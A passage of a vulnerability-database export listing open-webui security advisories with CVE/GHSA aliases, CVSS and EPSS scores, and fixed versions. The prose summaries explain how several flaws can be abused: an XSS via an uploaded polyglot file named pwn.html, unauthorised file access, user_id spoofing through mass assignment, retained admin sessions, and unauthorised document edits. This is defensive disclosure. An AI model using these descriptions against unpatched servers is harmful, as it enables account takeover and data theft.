vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wcz4-vwx4-tufb
39
vulnerability VCID-yug9-shts-kufb
40
vulnerability VCID-yysb-dk2k-f7g4
41
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.9
aliases CVE-2026-45351, GHSA-jh9g-8jqw-m2qx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wb88-83cj-ffhy
64
url VCID-wcz4-vwx4-tufb
vulnerability_id VCID-wcz4-vwx4-tufb
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL — the response comes back as text/html and any embedded <script> runs in the Open WebUI origin. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45315
reference_id
reference_type
scores
0
value 6e-05
scoring_system epss
scoring_elements 0.0047
published_at 2026-06-14T12:55:00Z
1
value 6e-05
scoring_system epss
scoring_elements 0.00463
published_at 2026-06-11T12:55:00Z
2
value 6e-05
scoring_system epss
scoring_elements 0.0046
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45315
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45315
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45315
4
reference_url https://github.com/advisories/GHSA-m8f9-9whg-f4xr
reference_id GHSA-m8f9-9whg-f4xr
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m8f9-9whg-f4xr
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr
reference_id GHSA-m8f9-9whg-f4xr
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-19T12:23:26Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-cw4k-3s8z-uqh8
6
vulnerability VCID-dzh3-rqx4-fqhv
7
vulnerability VCID-ef1t-pxjm-j7cz
8
vulnerability VCID-hj5f-yk3y-ffdg
9
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45315, GHSA-m8f9-9whg-f4xr
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wcz4-vwx4-tufb
65
url VCID-wja7-68ea-mug6
vulnerability_id VCID-wja7-68ea-mug6
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all file-related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45301
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45301
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45301
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45301
3
reference_url https://github.com/advisories/GHSA-r8wh-8m7r-fh33
reference_id GHSA-r8wh-8m7r-fh33
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r8wh-8m7r-fh33
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33
reference_id GHSA-r8wh-8m7r-fh33
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T19:40:58Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33
fixed_packages
0
url pkg:pypi/open-webui@0.3.16
purl pkg:pypi/open-webui@0.3.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-3hv8-ys1d-63a6
9
vulnerability VCID-4rz6-hw32-jueb
10
vulnerability VCID-4sn4-mrbm-dfgh
11
vulnerability VCID-4v8w-kv6g-kkbc
12
vulnerability VCID-4x63-8x64-d3bq
13
vulnerability VCID-5319-t7jm-y3bx
14
vulnerability VCID-5jna-wvd7-j7cm
15
vulnerability VCID-5wfg-zqcy-c7ar
16
vulnerability VCID-5wzn-mfwg-ybc3
17
vulnerability VCID-66zh-9jk7-9bfx
18
vulnerability VCID-68jf-2utx-x7br
19
vulnerability VCID-6rbm-rm25-hqgy
20
vulnerability VCID-7j5a-pu4k-kucf
21
vulnerability VCID-7nbc-ng1s-suck
22
vulnerability VCID-8n6u-wgz9-1bgj
23
vulnerability VCID-8nzh-cpda-dkca
24
vulnerability VCID-8qvj-xndv-v3ay
25
vulnerability VCID-8y4k-pj2n-8uhm
26
vulnerability VCID-94nj-qkdf-xfhn
27
vulnerability VCID-9jud-sr2a-8yc3
28
vulnerability VCID-9zyk-459z-x3a4
29
vulnerability VCID-chug-ma8r-cucc
30
vulnerability VCID-cw4k-3s8z-uqh8
31
vulnerability VCID-dz6g-jgmg-wqce
32
vulnerability VCID-dzh3-rqx4-fqhv
33
vulnerability VCID-ef1t-pxjm-j7cz
34
vulnerability VCID-gw77-ux3j-qfaa
35
vulnerability VCID-hj5f-yk3y-ffdg
36
vulnerability VCID-jfs9-dps1-27a2
37
vulnerability VCID-jnsg-u9dy-r3d5
38
vulnerability VCID-k17g-bd9g-67f7
39
vulnerability VCID-k9jf-5jzd-pkge
40
vulnerability VCID-mn21-kwuu-w7by
41
vulnerability VCID-n4ma-zcpv-5fbp
42
vulnerability VCID-nxvm-97r4-6ybz
43
vulnerability VCID-pkds-1xgn-q3bv
44
vulnerability VCID-pvep-chj7-ekeg
45
vulnerability VCID-pwsg-72yy-quhk
46
vulnerability VCID-q682-k826-efhv
47
vulnerability VCID-qgfh-7u8n-y7c7
48
vulnerability VCID-qjt1-zxx8-r7ht
49
vulnerability VCID-r7vt-4bqm-f7hb
50
vulnerability VCID-reqw-pfm8-c7g5
51
vulnerability VCID-rhhj-rccv-87hw
52
vulnerability VCID-s625-eg1w-gfd1
53
vulnerability VCID-t571-d65a-cyb2
54
vulnerability VCID-tz2k-gazs-mqgd
55
vulnerability VCID-u25g-p4nx-gqd1
56
vulnerability VCID-ujye-g4rj-8be5
57
vulnerability VCID-um53-kf7u-kkg6
58
vulnerability VCID-vghe-uuzj-m7cu
59
vulnerability VCID-vj38-mn12-v7br
60
vulnerability VCID-vkx3-71kv-sugt
61
vulnerability VCID-w2vd-r3hr-w3bt
62
vulnerability VCID-wb88-83cj-ffhy
63
vulnerability VCID-wcz4-vwx4-tufb
64
vulnerability VCID-yug9-shts-kufb
65
vulnerability VCID-yysb-dk2k-f7g4
66
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.16
aliases CVE-2026-45301, GHSA-r8wh-8m7r-fh33
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wja7-68ea-mug6
66
url VCID-yug9-shts-kufb
vulnerability_id VCID-yug9-shts-kufb
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra='allow'). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45396
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13588
published_at 2026-06-13T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13562
published_at 2026-06-14T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.13467
published_at 2026-06-11T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.13586
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45396
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45396
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45396
3
reference_url https://github.com/advisories/GHSA-rjmp-vjf2-qf4g
reference_id GHSA-rjmp-vjf2-qf4g
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rjmp-vjf2-qf4g
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g
reference_id GHSA-rjmp-vjf2-qf4g
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:16:35Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45396, GHSA-rjmp-vjf2-qf4g
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yug9-shts-kufb
67
url VCID-yysb-dk2k-f7g4
vulnerability_id VCID-yysb-dk2k-f7g4
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, administrative role changes and user deletions do not iterate SESSION_POOL to disconnect affected sessions. As a result, a user whose admin role has been revoked retains admin privileges within their existing Socket.IO session for as long as they keep the connection alive (via automatic heartbeats). The gap is exclusive to the Socket.IO session cache. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44553
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44553
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44553
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44553
3
reference_url https://github.com/advisories/GHSA-45m8-cpm2-3v65
reference_id GHSA-45m8-cpm2-3v65
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-45m8-cpm2-3v65
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65
reference_id GHSA-45m8-cpm2-3v65
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:42Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44553, GHSA-45m8-cpm2-3v65
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yysb-dk2k-f7g4
68
url VCID-ze3m-g96u-27fc
vulnerability_id VCID-ze3m-g96u-27fc
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the ydoc:document:update Socket.IO event handler checks whether the sender is a member of the document's Socket.IO room (line 678) but does not verify that the sender has write permission. Users with read-only access join the document room via ydoc:document:join, which only requires read permission (line 520). Once in the room, the user can emit ydoc:document:update events that modify the in-memory Yjs document state and are broadcast to all other collaborators in real time. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44564
reference_id
reference_type
scores
0
value 0.00042
scoring_system epss
scoring_elements 0.13273
published_at 2026-06-12T12:55:00Z
1
value 0.00042
scoring_system epss
scoring_elements 0.13253
published_at 2026-06-14T12:55:00Z
2
value 0.00042
scoring_system epss
scoring_elements 0.13172
published_at 2026-06-11T12:55:00Z
3
value 0.00042
scoring_system epss
scoring_elements 0.13279
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44564
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44564
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44564
3
reference_url https://github.com/advisories/GHSA-vrfh-rj4q-rmhr
reference_id GHSA-vrfh-rj4q-rmhr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vrfh-rj4q-rmhr
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-vrfh-rj4q-rmhr
reference_id GHSA-vrfh-rj4q-rmhr
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:10:30Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-vrfh-rj4q-rmhr
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44564, GHSA-vrfh-rj4q-rmhr
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ze3m-g96u-27fc
Fixing_vulnerabilities
Risk_score 4.5
Resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.10